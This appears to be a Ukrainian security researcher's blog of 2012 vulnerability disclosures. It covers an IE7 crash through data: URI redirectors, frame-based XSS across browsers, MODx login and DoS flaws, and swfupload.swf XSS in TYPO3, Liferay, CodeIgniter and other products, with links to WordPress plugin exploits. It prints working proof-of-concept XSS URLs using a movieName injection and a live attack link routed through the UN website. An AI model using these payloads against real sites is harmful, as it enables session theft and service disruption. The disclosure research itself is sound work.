Websecurity - Веб безпека

В записі Cross-Site Scripting уразливості в різних браузерах, я згадував про DoS уразливості в сьомому IE. Ось детальна інформація про них.

Під час досліджень XSS в різних браузерах, 05.08.2010 та 16.09.2012, я виявив Denial of Service уразливості в Internet Explorer 7. Що цікаво, IE6 та IE8 невразливі, тільки IE7.

DoS:

При включенні редиректора з відповіддю 301, 302 або 303 і data: URI в заголовку Location у тег frame або iframe, браузер вибиває (атака не працює при інших 30x статусах). Це відбувається через access violation (aka segmentation fault) в iexplore.exe.

Експлоіт:

IE7 DoS.txt

Це 302 редиректор на Perl. А в якості 301 редиректора можете використати мій приклад з data: URI на TinyURL:

http://tinyurl.com/fj4hm

Атака спрацьовує лише з другої спроби. Тому потрібно двічі звернутися до редиректора (двічі вказати URL в адресному рядку, чи після появи сторінки про помилку повернутися на попередню сторінку в браузері).

Приклад атаки через уразливість на сайті ООН:

http://www.un.org/zh/documents/view_doc.asp?url=http://tinyurl.com/fj4hm

Уразливі Internet Explorer 7 (7.00.5730.13) та інші версії IE7.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Wordpress Brute Force Tool, WP E-Commerce та Tagged Albums. Для котрих з’явилися експлоіти. Wordpress Brute Force Tool - це інструмент для проведення брутфорс атак на Wordpress, WP E-Commerce - це плагін для створення онлайн магазину, Tagged Albums - це плагін для створення фото альбомів з тегами.

• Janissaries Wordpress Brute Force Tool (деталі)
• WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting (деталі)
• WordPress Tagged Albums SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Novell eDirectory RelativeToFullDN Parsing Remote Code Execution Vulnerability (деталі)
• NetCat CMS v5.0.1 - Multiple Web Vulnerabilities (деталі)
• PG Dating Pro v1.0 CMS - Multiple Web Vulnerabilities (деталі)
• VaM Shop v1.69 - Multiple Web Vulnerabilities (деталі)
• GE Proficy Real-Time Information Portal Remote Interface Service Remote Code Execution Vulnerability (деталі)
• XSS in dokeos 2.1.1 (деталі)
• EmpireCMS Template Parser Remote PHP Code Execution Vulnerability (деталі)
• AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities (деталі)
• Lsoft ListServ v16 (WA revision R4241) SHOWTPL parameter Cross-SIte Scripting - XSS (деталі)
• Vulnerability Report on AWCM 2.2 (деталі)

05.08.2010

У листопаді, 30.11.2009, я виявив Cross-Site Scripting уразливості в різних браузерах. Зокрема в Mozilla Firefox, Internet Explorer, Google Chrome та Opera.

Дані уразливості дозволяють виконувати XSS атаки на численні сайти, в тому числі ті, що не мають XSS уразливостей (блокують відповідні XSS атаки). Тобто браузери дозволяють обходити дані XSS фільтри. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам браузерів.

28.11.2012

Дане дослідження є продовженням моїх досліджень Cross-Site Scripting атаки через редиректори та Cross-Site Scripting через редиректори 301 і 303 в різних браузерах (зроблених в 2009 і 2012 роках відповідно). Після анонсу в серпні 2010, я планував встановити декілька нових браузерів, провести дослідження в них (на додачу до раніше зроблених в інших браузерах) і найближчим часом опублікувати результати, але публікація відклалася. Лише у вересні цього року я зробив додаткові дослідження з 301 і 303 редиректорами (для вищезгаданої і цієї статті), та почав оприлюднювати результати.

Редиректори можуть використовуватися для проведення XSS атак на сайти, що дозволяють вказувати адресу фрейма. При включенні редиректора у frame чи iframe можна провести XSS атаку. Це Remote XSS Include (RXI) підкласс Cross-Site Scripting уразливостей і вони достатньо поширені в Інтернеті.

Код спрацює по різному в різних браузерах - так само як і при прямому запиті до редиректорів, описаних у вищезгаданих статтях. В одних браузерах працює атака через одні редиректори, в інших - через інші.

XSS:

Атака працює в наступних редиректорах:

1. Через Location редиректор (301 Moved Permanently) data: URI - працює в Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 та Opera 9.52, 10.62 без доступу до кукісів та DoS в IE7
2. Через Location редиректор (301 Moved Permanently) javascript: URI - працює в Opera 10.62 (як Strictly social XSS) без доступу до кукісів
3. Через Location редиректор (302 Found) data: URI - працює в Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 та Opera 9.52, 10.62 (як Strictly social XSS) без доступу до кукісів та DoS в IE7
4. Через Location редиректор (302 Found, Object Moved або Moved Temporarily) javascript: URI - працює в Firefox 3.0.19, 3.5.19, 3.6.28 як Strictly social XSS, код виконається в контексті сайта з редиректором, Opera 10.62 (як Strictly social XSS без доступу до кукісів)
5. Через Refresh редиректор data: URI - працює в Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 без доступу до кукісів та Chrome
6. Через Refresh редиректор javascript: URI - працює в Firefox (до версії 3.0.9), IE6, Chrome та Opera 9.52 (до версії 10)
7. Через Location редиректор (303 See other) data: URI - працює в Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 та Opera 10.62 без доступу до кукісів та DoS в IE7
8. Через Location редиректор (303 See other) javascript: URI - працює в Opera 10.62 (як Strictly social XSS) без доступу до кукісів

Атака №4 працює в Mozilla Firefox 8.0.1 та попередніх версіях, а в версіях 9.0.1, 10.0.7, 15.0.1 вже ні - видає “Corrupted Content Error”. Тобто дана уразливість була приховано виправлена в версії 9.0. Мозілі я повідомив про ці атаки на їхній браузер ще 07.08.2010.

Дані уразливості дозволяють проводити універсальну XSS атаку на сайтах, що дозволяють вказувати адресу frame/iframe, навіть якщо вони напряму не допускають XSS (блокують javascript, vbscript і data URI). Найкраще для атаки підходить Refresh-редиректори.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Calendar-Script, Eco-Annu та Related Posts Exit Popup. Для котрих з’явилися експлоіти. Calendar-Script - це органайзер і календар, Eco-Annu - це плагін для створення карти на базі Google Maps, Related Posts Exit Popup - це плагін для виведення попапу з пов’язаними постами при закритті сторінки сайта.

• WordPress Calendar-Script Blind SQL Injection (деталі)
• WordPress Eco-Annu SQL Injection (деталі)
• WordPress Related Posts Exit Popup SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

11.07.2012

У липні, 04.07.2012, я знайшов Cross-Site Scripting уразливості на http://www.kmu.gov.ua - сайті Кабінету Міністрів України. Одну уразливість виявив AmplenuS, про що повідомив мені, а коли я її перевірив, то я знайшов іще одну. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже неодноразово писав про дірки на сайті Кабміну. В останнє - коли писав про уразливості на kvs.gov.ua, dcz.gov.ua та kmu.gov.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.11.2012

XSS:

• alert(document.cookie)
• alert(document.cookie)

Дані уразливості вже виправлені. Але як і в попередні роки (починаючи з 2006 року), коли я повідомляв Кабміну про уразливості на їхньому сайті, подякувати вони не спромоглися.

При цьому на сайті все ще є інші уразливості. Тобто що в 2006, що в 2012 році, Кабмін та інші міністерства ведуть себе невдячно і продовжують не слідкувати за безпекою власних сайтів.

28.06.2012

У травні, 18.05.2012, під час пентесту, я виявив багато уразливостей в системі MODx, зокрема Cross-Site Request Forgery, Abuse of Functionality, Denial of Service та Insufficient Anti-automation. Це друга порція уразливостей в MODx. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в MODx.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

24.11.2012

Cross-Site Request Forgery (WASC-09):

Відсутність захисту від Brute Force (такого як капча) в формі логіна (http://site/manager/) також призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін в акаунт (щоб проводити атаки на уразливості всередині акаунта). Це також може бути використано для автоматизованого входу в акаунт, фішинга та інших автоматизованих атак. Нижченаведена DoS атака проводиться через дану CSRF уразливість.

Abuse of Functionality (Login Enumeration) (WASC-42):

В формі логіна (http://site/manager/) можливий підбір логінів. Якщо блокування не спрацьовує після трьох запитів (як може бути встановлене на сайті), значить немає такого логіна в системі, тобто воно спрацьовує лише для робочих логінів. Атака можлива, якщо включене блокування.

Експлоіт:

MODx Abuse of Functionality-1.html

Abuse of Functionality (WASC-42):

Після знаходження логіна з вищезгаданою уразливістю можливе зловживання блокуванням акаунтів. Після трьох запитів (як може бути встановлене на сайті) акаунт може бути заблокований (навіть акаунт адміна). Постійно посилаючи запити до цього функціоналу (по три некоректні запити), можна постійно тримати акаунт заблокованим (в тому числі адмінський).

Експлоіт:

MODx Abuse of Functionality-2.html

Denial of Service (WASC-10):

Посилаючи POST запит скрипту http://site/manager/processors/login.processor.php, він повертається на попередню сторінку, яка знову відсилає запит до цього скрипта. Таким чином створюється Looped DoS, що може створити навантаження на сервер.

Експлоіт:

MODx Looped DoS.html

Insufficient Anti-automation (WASC-21):

В формі логіна (http://site/manager/) немає захисту від автоматизований запитів, що дозволяє автоматизовано підбирати логіни (через Abuse of Functionality уразливість). Так само як автоматизовано підбирати паролі (через Brute Force уразливість) до підібраних логінів. А також проводити автоматизоване блокування виявлених акаунтів.

В формі відновлення паролю (http://site/manager/index.php ?action=show_form) немає захисту від автоматизований запитів, що дозволяє автоматизовано підбирати емайли користувачів.

Уразливі MODx 1.0.6 та попередні версії.

В даній добірці уразливості в веб додатках:

• Multiple integer overflows in libxml2 (деталі)
• PIAF H.M.S - SQL Injection (деталі)
• request-tracker3.8 security update (деталі)
• rtfm security update (деталі)
• HP iNode Management Center, Remote Execution of Arbitrary Code (деталі)
• Exploit - EasyITSP by Lemens Telephone Systems 2.0.2 (деталі)
• SQL Injection Vulnerability in OrangeHRM (деталі)
• Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution Vulnerability (деталі)
• (0Day) HP iNode Management Center iNodeMngChecker.exe Remote Code Execution Vulnerability (деталі)
• PrestaShop <= 1.5.1 Persistent XSS (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах UK Cookie, Hitasoft FLV Player та Kakao Theme. Для котрих з’явилися експлоіти. UK Cookie - це плагін для сайтів в Великобританнії, де з 26.05.2012 почали діяти штрафи стосовно cookies, Hitasoft FLV Player - це FLV-плеєр, Kakao Theme - це тема движка.

• Reflective XSS in uk cookie plugin (деталі)
• WordPress Hitasoft FLV Player 1.1 SQL Injection (деталі)
• WordPress Kakao Theme SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Раніше я писав про XSS уразливість в TinyMCE, SPIP, Radiant CMS, AionWeb, Liferay Portal, SurgeMail, symfony (в swfupload) і ця дірка має місце в багатьох інших веб додатках.

Якщо в попередніх записах я писав про веб додатки з swfupload_f8.swf, swfupload_f9.swf і swfupload.swf (які призначені для Flash Player 8, 9 і 10), то зараз я напишу про веб додатки з swfupload_f10.swf та swfupload_f11.swf, які призначені для Flash Player 10 і 11. Зокрема я виявив дану Cross-Site Scripting уразливість в SwfUploadPanel для TYPO3 CMS, Archiv plugin для TinyMCE, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), Swfupload для Drupal, SWFUpload для Codeigniter та SentinelleOnAir - серед багатьох веб додатків, що постачаються з swfupload_f10.swf або swfupload_f11.swf.

XSS:

SwfUploadPanel для TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin для TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В Archiv plugin для TinyMCE окрім swfupload_f9.swf і swfupload_f8.swf, описаних раніше, також присутній і swfupload_f10.swf.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В Liferay Portal окрім swfupload_f9.swf і swfupload_f8.swf, описаних раніше, також присутній і swfupload_f10.swf.

Swfupload для Drupal:

Як можна побачити з проекту http://code.google.com/p/drupal-swfupload/ - існує версія Swfupload для Drupal. Але саме в цьому проекті немає файлів. Зате вони є в проекті Respectiva, що представляє собою Drupal з Swfupload.

http://site/js/libs/swfupload_f10.swf

SWFUpload для Codeigniter:

http://site/www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/www/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/www/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Це стосовно swfupload_f10.swf. А стосовно swfupload_f11.swf, то в індексі Гугла є лише один проект - SentinelleOnAir, що містить swfupload_f11.swf.

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload11.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Уразливі потенційно всі версії SwfUploadPanel для TYPO3 CMS, Archiv plugin для TinyMCE, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), Swfupload для Drupal, SWFUpload для Codeigniter та SentinelleOnAir (при цьому 20.04.2012 дана уразливість була виправлена в WordPress 3.3.2).